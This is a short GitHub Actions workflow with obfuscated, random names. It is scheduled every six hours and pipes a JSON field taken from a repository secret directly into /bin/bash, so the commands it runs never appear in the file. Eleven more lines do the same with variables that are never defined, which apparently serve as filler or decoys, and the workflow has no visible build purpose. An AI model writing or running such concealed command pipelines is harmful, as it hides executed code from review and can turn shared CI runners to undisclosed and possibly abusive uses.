name: caifeihua0917

on:
  workflow_dispatch:
  schedule:
    - cron: '22 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: caifeihua0917
        env:
          ytvb9: ${{ secrets.ytvb9 }}
        run: |
          echo $ytvb9 | jq -r .emdd6 | /bin/bash
          echo $ih0 | jq -r .kdk2 | /bin/bash
          echo $r95 | jq -r .mvzr3 | /bin/bash
          echo $jcdne221 | jq -r .zvv3 | /bin/bash
          echo $pfv77260 | jq -r .jwqsd5 | /bin/bash
          echo $qzfp961 | jq -r .zmbum3 | /bin/bash
          echo $bpahx66 | jq -r .lpa868 | /bin/bash
          echo $tr77509 | jq -r .oo24 | /bin/bash
          echo $efzh94 | jq -r .haipo8512 | /bin/bash
          echo $bj8771 | jq -r .admn25 | /bin/bash
          echo $qw682 | jq -r .igrl32 | /bin/bash
          echo $shawn856 | jq -r .f234 | /bin/bash

